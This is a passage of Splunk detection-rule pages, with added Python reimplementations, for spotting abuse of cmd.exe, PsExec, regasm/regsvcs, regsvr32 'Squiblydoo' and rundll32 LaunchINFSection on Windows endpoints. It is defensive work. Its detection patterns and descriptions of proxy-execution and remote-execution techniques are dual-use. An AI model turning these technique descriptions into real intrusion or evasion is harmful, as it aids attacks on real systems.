| tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe by Processes.parent_process_name Processes.process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |search [`prohibited_apps_launching_cmd`] | `detect_prohibited_applications_spawning_cmd_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts and populates the Endpoint data model with the resultant dataset. This search includes a lookup file, `prohibited_apps_launching_cmd.csv`, that contains a list of processes that should not be spawning cmd.exe. You can modify this lookup to better suit your environment.

Required field

ATT&CK

ID Technique Tactic
T1059.003 Windows Command Shell Execution


Kill Chain Phase

  • Exploitation


Known False Positives

There are circumstances where an application may legitimately execute and interact with the Windows command-line interface. Investigate and modify the lookup file, as appropriate.

Reference

Test Dataset


version: 5


Detect prohibited applications spawning cmd exe

This search looks for executions of cmd.exe spawned by a process that is often abused by attackers and that does not typically launch cmd.exe. This is a SPL2 implementation of the rule `Detect Prohibited Applications Spawning cmd.exe` by @bpatel.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1059
  • Last Updated: 2020-07-13

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)) | eval process_name=ucast(map_get(input_event, "process_name"), "string", null), parent_process=lower(ucast(map_get(input_event, "parent_process_name"), "string", null)), dest_user_id=ucast(map_get(input_event, "dest_user_id"), "string", null), dest_device_id=ucast(map_get(input_event, "dest_device_id"), "string", null) | where process_name="cmd.exe" | rex field=parent_process "(?<field0>[^\\\\]+)$" | where field0="winword.exe" OR field0="excel.exe" OR field0="outlook.exe" OR field0="powerpnt.exe" OR field0="visio.exe" OR field0="mspub.exe" OR field0="acrobat.exe" OR field0="acrord32.exe" OR field0="chrome.exe" OR field0="iexplore.exe" OR field0="opera.exe" OR field0="firefox.exe" OR field0="java.exe" OR field0="powershell.exe" | eval start_time=timestamp, end_time=timestamp, entities=mvappend(dest_device_id, dest_user_id), body="TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Sysmon logs. This search has been modified to process raw Sysmon data from attack_range's NXLog forwarders on DSP.

Required field

  • process_name
  • parent_process_name
  • _time
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1059 Command and Scripting Interpreter Execution


Kill Chain Phase

  • Exploitation


Known False Positives

There are circumstances where an application may legitimately execute and interact with the Windows command-line interface. Investigate, and adjust the list of parent process names carried inline in the search as appropriate.

Reference

Test Dataset

version: 1


Detect psexec with accepteula flag

This search looks for events where `PsExec.exe` is run with the `accepteula` flag in the command line. PsExec is a Microsoft Sysinternals utility that enables you to execute processes on other systems. It is fully interactive for console applications. This tool is widely used for launching interactive command prompts on remote systems, and threat actors leverage it extensively for executing code on compromised systems. The first time PsExec runs on a host it prompts the user to accept the end-user license agreement (EULA); the prompt can be suppressed by passing `accepteula` on the command line, which is why scripted or attacker-driven use of PsExec tends to include it.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1021.002
  • Last Updated: 2020-11-10

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process=*psexec* Processes.process=*accepteula* by Processes.process_name Processes.dest Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_psexec_with_accepteula_flag_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1021.002 SMB/Windows Admin Shares Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators can leverage PsExec for accessing remote systems and might pass `accepteula` as an argument if they are running this tool for the first time. However, it is not likely that you'd see multiple occurrences of this event on a machine.

Reference

Test Dataset


version: 3


Detect rare executables

This search will return a table of rare processes, the names of the systems running them, and the users who initiated each process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK:
  • Last Updated: 2020-03-16

Search

| tstats `security_content_summariesonly` count values(Processes.dest) as dest values(Processes.user) as user min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.process_name | rename Processes.process_name as process | rex field=user "(?<user_domain>.*)\\\\(?<user_name>.*)" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search [ | tstats count from datamodel=Endpoint.Processes by Processes.process_name | rare Processes.process_name limit=30 | rename Processes.process_name as process | `filter_rare_process_allow_list` | table process ] | `detect_rare_executables_filter`
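The search above ranks process names by how seldom they run, keeps the 30 rarest, drops allow-listed names, and then pulls back the hosts and users for the survivors. The Python below is an added example, not Splunk's code, of that flow on constructed process records; the allow-list contents, event fields, host and user names are assumptions, and the user split mirrors the search's `rex` on the domain\user form. As in the search, allow-listed names are removed after the rarest N are taken, so they still consume slots in the limit.

```python
import re
from collections import Counter

RARE_LIMIT = 30   # `rare Processes.process_name limit=30`

# Stand-in for rare_process_allow_list_default.csv / rare_process_allow_list_local.csv
# (assumption: the shipped lookups are not reproduced on this page).
ALLOW_LIST = {"sysprep.exe", "wusa.exe"}

# Mirrors `rex field=user "(?<user_domain>.*)\\\\(?<user_name>.*)"`.
_USER = re.compile(r"(?P<user_domain>.*)\\(?P<user_name>.*)")


def split_user(user):
    """'CORP\\alice' -> ('CORP', 'alice'); a bare account name has no domain."""
    m = _USER.match(user)
    return (m.group("user_domain"), m.group("user_name")) if m else ("", user)


def rarest_processes(events, limit=RARE_LIMIT, allow=ALLOW_LIST):
    """Process names with the lowest execution counts, like the
    `rare ... limit=N | filter_rare_process_allow_list` subsearch.
    Ties are broken by name so the result is deterministic; the allow
    list is applied after the cut, exactly as the search does it."""
    counts = Counter(ev["process_name"].lower() for ev in events)
    ordered = sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))
    return [name for name, _ in ordered[:limit] if name not in allow]


def rare_executable_report(events, limit=RARE_LIMIT, allow=ALLOW_LIST):
    """One row per rare process: count, hosts, (domain, user) pairs and
    first/last seen, the same shape the outer tstats produces."""
    wanted = set(rarest_processes(events, limit, allow))
    rows = {}
    for ev in events:
        name = ev["process_name"].lower()
        if name not in wanted:
            continue
        row = rows.setdefault(name, {"count": 0, "dest": set(), "user": set(),
                                     "firstTime": ev["_time"], "lastTime": ev["_time"]})
        row["count"] += 1
        row["dest"].add(ev["dest"])
        row["user"].add(split_user(ev["user"]))
        row["firstTime"] = min(row["firstTime"], ev["_time"])
        row["lastTime"] = max(row["lastTime"], ev["_time"])
    return rows


# Constructed sample records (not real telemetry): two common binaries,
# one allow-listed imaging tool and two one-off executables.
SAMPLE_EVENTS = (
    [{"_time": 1584316800 + i, "dest": "ws%02d" % (i % 4), "user": "CORP\\alice",
      "process_name": "svchost.exe"} for i in range(12)]
    + [{"_time": 1584316900 + i, "dest": "ws%02d" % (i % 3), "user": "CORP\\bob",
        "process_name": "explorer.exe"} for i in range(6)]
    + [{"_time": 1584317000 + i, "dest": "img01", "user": "CORP\\imaging",
        "process_name": "sysprep.exe"} for i in range(2)]
    + [{"_time": 1584317100, "dest": "ws01", "user": "CORP\\alice",
        "process_name": "dbgtool.exe"},
       {"_time": 1584317200, "dest": "srv02", "user": "svc_deploy",
        "process_name": "Updater_Tmp.exe"}]
)

if __name__ == "__main__":
    # A limit of 3 keeps the demonstration readable on this small sample.
    for name, row in rare_executable_report(SAMPLE_EVENTS, limit=3).items():
        print(name, row["count"], sorted(row["dest"]), sorted(row["user"]))
```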

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts and populating the endpoint data model with the resultant dataset. The macro `filter_rare_process_allow_list` searches two lookup files for allowed processes. These consist of `rare_process_allow_list_default.csv` and `rare_process_allow_list_local.csv`. To add your own processes to the allow list, add them to `rare_process_allow_list_local.csv`. If you wish to remove an entry from the default lookup file, you will have to modify the macro itself to set the allow_list value for that process to false. You can modify the limit parameter and search scheduling to better suit your environment.

Required field

Kill Chain Phase

  • Installation
  • Command and Control
  • Actions on Objectives


Known False Positives

Some legitimate processes may be only rarely executed in your environment. As these are identified, update `rare_process_allow_list_local.csv` to filter them out of your search results.

Reference

Test Dataset

version: 5


Detect regasm spawning a process

The following analytic identifies regasm.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-12

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regasm.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_spawning_a_process_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting process execution data, including parent and child process names and command lines, from your endpoints into the `Endpoint` data model in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regasm.exe or regsvcs.exe spawning a child process may cause a false positive. Filter based on endpoint usage, command-line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regasm with network connection

The following analytic identifies regasm.exe with a network connection to a public IP address, excluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Once a remote command and control server has been contacted, the adversary can deliver further tooling and work toward their objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-16

Search

`sysmon` EventID=3 dest_ip!=10.0.0.0/8 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regasm.exe | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, User, process_name, src_ip, dest_host, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_with_network_connection_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting Sysmon network connection events (EventID 3), which carry the process name together with the source and destination IP addresses; the search relies on the `sysmon` macro and on Sysmon field names. You must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regasm.exe with a network connection may cause a false positive. Filter based on endpoint usage, command-line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regasm with no command line arguments

The following analytic identifies regasm.exe executing with no command-line arguments. When another process starts regasm.exe as a host for injected code, it is typically launched without arguments, so an empty command line is the tell. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe is natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-12

Search

`sysmon` EventID=1 (process_name=regasm.exe OR OriginalFileName=RegAsm.exe) | regex CommandLine="(?i)(regasm\.exe.{0,4}$)" | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, User, ParentImage, ParentCommandLine, process_name, OriginalFileName, process_path, CommandLine | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_with_no_command_line_arguments_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regasm.exe launched without arguments may cause a false positive. Filter based on endpoint usage, command-line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regsvcs spawning a process

The following analytic identifies regsvcs.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-12

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regsvcs.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_spawning_a_process_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting process execution data, including parent and child process names and command lines, from your endpoints into the `Endpoint` data model in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regasm.exe or regsvcs.exe spawning a child process may cause a false positive. Filter based on endpoint usage, command-line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regsvcs with network connection

The following analytic identifies Regsvcs.exe with a network connection to a public IP address, excluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Once a remote command and control server has been contacted, the adversary can deliver further tooling and work toward their objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-16

Search

`sysmon` EventID=3 dest_ip!=10.0.0.0/8 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regsvcs.exe | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, User, process_name, src_ip, dest_host, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_with_network_connection_filter`
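Both the regasm.exe and the regsvcs.exe network-connection searches rely on excluding RFC 1918 space so that only connections to public addresses remain. The Python below is an added example, not Splunk's code, of that filter applied to constructed Sysmon EventID 3 records; the event fields, host and user names are assumptions, and TEST-NET documentation ranges stand in for public addresses. It also shows why the mask on the 10.0.0.0 block matters: 10.0.0.0/8 is the RFC 1918 range, whereas 10.0.0.0/12 stops at 10.15.255.255 and lets the rest of 10/8 through as if it were public, so a search written with /12 reports internal file-server traffic as an external connection.

```python
import ipaddress

# RFC 1918 private address space. The first block is 10.0.0.0/8: written as
# 10.0.0.0/12 it would only cover 10.0.0.0-10.15.255.255, so a connection to
# 10.200.1.5 would be reported as "public" (see WRONG_SLASH12 below).
PRIVATE_NETS = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
)
# The same list with the mistaken mask, kept only to demonstrate the gap.
WRONG_SLASH12 = (ipaddress.ip_network("10.0.0.0/12"),) + PRIVATE_NETS[1:]

# Binaries covered by the two network-connection searches.
WATCHED = {"regasm.exe", "regsvcs.exe"}


def is_private(ip, nets=PRIVATE_NETS):
    """True when `ip` falls inside one of `nets`. IPv6 addresses never match
    these IPv4 networks, so add fc00::/7 (and loopback/link-local ranges) if
    your endpoints have IPv6 connectivity."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def public_connections(events, nets=PRIVATE_NETS):
    """Apply the search logic to Sysmon EventID 3 records: keep connections
    made by a watched binary to an address outside `nets`, returned as
    (dest, User, process_name, dest_ip) tuples ready for aggregation."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 3:
            continue
        if ev.get("process_name", "").lower() not in WATCHED:
            continue
        if is_private(ev["dest_ip"], nets):
            continue
        hits.append((ev["Computer"], ev["User"], ev["process_name"].lower(), ev["dest_ip"]))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 3, "Computer": "ws01", "User": "CORP\\alice", "process_name": "regasm.exe",
     "src_ip": "10.1.2.3", "dest_ip": "203.0.113.10", "dest_host": "-"},
    # internal file server: private with /8, wrongly "public" with /12
    {"EventID": 3, "Computer": "ws02", "User": "CORP\\bob", "process_name": "regasm.exe",
     "src_ip": "10.1.2.4", "dest_ip": "10.200.1.5", "dest_host": "fileserver"},
    {"EventID": 3, "Computer": "ws03", "User": "CORP\\carol", "process_name": "RegSvcs.exe",
     "src_ip": "10.1.2.5", "dest_ip": "198.51.100.20", "dest_host": "-"},
    # top of the 172.16.0.0/12 block
    {"EventID": 3, "Computer": "ws04", "User": "CORP\\dan", "process_name": "regsvcs.exe",
     "src_ip": "10.1.2.6", "dest_ip": "172.31.255.1", "dest_host": "proxy"},
    # a browser is outside the searches' scope
    {"EventID": 3, "Computer": "ws05", "User": "CORP\\erin", "process_name": "chrome.exe",
     "src_ip": "10.1.2.7", "dest_ip": "198.51.100.7", "dest_host": "www.example"},
    # process creation, not a network connection
    {"EventID": 1, "Computer": "ws01", "User": "CORP\\alice", "process_name": "regasm.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe"},
]

if __name__ == "__main__":
    for hit in public_connections(SAMPLE_EVENTS):
        print("public connection:", hit)
    extra = set(public_connections(SAMPLE_EVENTS, WRONG_SLASH12)) - set(public_connections(SAMPLE_EVENTS))
    print("extra noise with 10.0.0.0/12:", extra)
```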

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting Sysmon network connection events (EventID 3), which carry the process name together with the source and destination IP addresses; the search relies on the `sysmon` macro and on Sysmon field names. You must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regsvcs.exe with a network connection may cause a false positive. Filter based on endpoint usage, command-line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regsvcs with no command line arguments

The following analytic identifies regsvcs.exe executing with no command-line arguments. When another process starts regsvcs.exe as a host for injected code, it is typically launched without arguments, so an empty command line is the tell. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regsvcs.exe is natively found in C:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-12

Search

`sysmon` EventID=1 (process_name=regsvcs.exe OR OriginalFileName=RegSvcs.exe) | regex CommandLine="(?i)(regsvcs\.exe.{0,4}$)" | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, User, ParentImage, ParentCommandLine, process_name, OriginalFileName, process_path, CommandLine | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_with_no_command_line_arguments_filter`
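The regasm.exe and regsvcs.exe no-argument searches both hinge on a regex of the form `<name>\.exe.{0,4}$`, which tolerates a closing quote or trailing whitespace after the image name but not an actual switch or DLL path. The Python below is an added example, not Splunk's code, of that selection and regex applied to constructed Sysmon EventID 1 records; the event fields, paths, host and user names are assumptions. The pattern is compiled case-insensitively, because Splunk's `regex` command is case-sensitive unless the pattern starts with `(?i)` and the .NET binaries are usually logged as RegAsm.exe and RegSvcs.exe. The example also shows that a renamed copy picked up via OriginalFileName is still not reported, since its command line no longer ends in the original image name; catching that case is the job of a separate renamed-binary analytic.

```python
import re

# Mirrors `regex CommandLine="(<name>\.exe.{0,4}$)"` from the searches above,
# made case-insensitive so RegAsm.exe / RegSvcs.exe as Windows logs them match.
NO_ARGS = {
    "regasm.exe": re.compile(r"regasm\.exe.{0,4}$", re.IGNORECASE),
    "regsvcs.exe": re.compile(r"regsvcs\.exe.{0,4}$", re.IGNORECASE),
}


def launched_without_arguments(binary, command_line):
    """True when `command_line` ends within four characters of the image
    name: enough for a closing quote or trailing whitespace, not for a
    switch or a DLL path."""
    return bool(NO_ARGS[binary].search(command_line))


def no_arg_launches(events, binary):
    """Apply the page's logic for one binary to Sysmon EventID 1 records.

    Selection uses process_name OR the PE OriginalFileName, as the search
    does, so a renamed copy is examined; the command-line regex then only
    fires when the command line still ends in the original image name, so
    a renamed copy (svc.exe with OriginalFileName RegAsm.exe) is not
    reported here. Returns (dest, User, ParentImage, CommandLine) tuples."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        name = ev.get("process_name", "").lower()
        original = ev.get("OriginalFileName", "").lower()
        if binary not in (name, original):
            continue
        if launched_without_arguments(binary, ev.get("CommandLine", "")):
            hits.append((ev["Computer"], ev["User"], ev["ParentImage"], ev["CommandLine"]))
    return hits


# Constructed sample records (not real telemetry).
FW64 = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
SAMPLE_EVENTS = [
    # bare image path, no arguments: the injection pattern
    {"EventID": 1, "Computer": "ws01", "User": "CORP\\alice", "process_name": "regasm.exe",
     "OriginalFileName": "RegAsm.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\stage.exe",
     "CommandLine": FW64 + r"\regasm.exe"},
    # quoted path with a trailing space: still within the 4-character allowance
    {"EventID": 1, "Computer": "ws02", "User": "CORP\\bob", "process_name": "regasm.exe",
     "OriginalFileName": "RegAsm.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"' + FW64 + r'\regasm.exe" '},
    # legitimate registration with arguments: not reported
    {"EventID": 1, "Computer": "ws03", "User": "CORP\\carol", "process_name": "regasm.exe",
     "OriginalFileName": "RegAsm.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": FW64 + r"\regasm.exe /codebase C:\Apps\Vendor\Component.dll"},
    # mixed case, as Windows usually logs it
    {"EventID": 1, "Computer": "ws04", "User": "CORP\\dan", "process_name": "RegSvcs.exe",
     "OriginalFileName": "RegSvcs.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": FW64 + r"\RegSvcs.exe"},
    # renamed copy: selected via OriginalFileName, but the regex cannot match
    {"EventID": 1, "Computer": "ws05", "User": "CORP\\erin", "process_name": "svc.exe",
     "OriginalFileName": "RegAsm.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Users\Public\svc.exe"},
]

if __name__ == "__main__":
    for binary in NO_ARGS:
        for hit in no_arg_launches(SAMPLE_EVENTS, binary):
            print(binary, "started without arguments:", hit)
```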

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting Sysmon process creation events (EventID 1) with the process name, parent process, and command line from your endpoints; the search relies on the `sysmon` macro and on Sysmon field names. You must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regsvcs.exe launched without arguments may cause a false positive. Filter based on endpoint usage, command-line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regsvr32 application control bypass

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding (OLE) controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft-signed binary. This variation of the technique is often referred to as a "Squiblydoo" attack. Upon investigating, look for network connections to remote destinations (internal or external). Be careful if you modify the query to look for "scrobj.dll": the ".dll" extension is not required to load scrobj, so matching on the full file name would miss invocations that pass only "scrobj". "scrobj.dll" will be loaded by "regsvr32.exe" upon execution.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.010
  • Last Updated: 2021-01-28

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=regsvr32.exe OR Processes.process_name!=regsvr32.exe) Processes.process=*scrobj* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvr32_application_control_bypass_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships, from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model. As written, the `(process_name=regsvr32.exe OR process_name!=regsvr32.exe)` clause matches any process whose command line references scrobj, which also catches renamed copies of regsvr32.exe; tune the query by modifying or removing the `!=regsvr32.exe` side if it is too noisy.

Required field

ATT&CK

ID Technique Tactic
T1218.010 Regsvr32 Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Limited false positives related to third-party software registering DLLs.

Reference


Test Dataset


version: 1


Detect rundll32 application control bypass - advpack

The following analytic identifies rundll32.exe loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.011
  • Last Updated: 2021-02-04

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe Processes.process=*advpack* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___advpack_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting process execution data, including process names and command lines, from your endpoints into the `Endpoint` data model in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.011 Rundll32 Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, some legitimate applications may use advpack.dll or ieadvpack.dll, triggering a false positive.

Reference


Test Dataset


version: 1


Detect rundll32 application control bypass - setupapi

The following analytic identifies rundll32.exe loading setupapi.dll and iesetupapi.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.011
  • Last Updated: 2021-02-04

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe Processes.process=*setupapi* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___setupapi_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting process execution data, including process names and command lines, from your endpoints into the `Endpoint` data model in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.011 Rundll32 Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, some legitimate applications may use setupapi.dll or iesetupapi.dll, triggering a false positive.

Reference


Test Dataset


version: 1


Detect rundll32 application control bypass - syssetup

The following analytic identifies rundll32.exe loading syssetup.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.

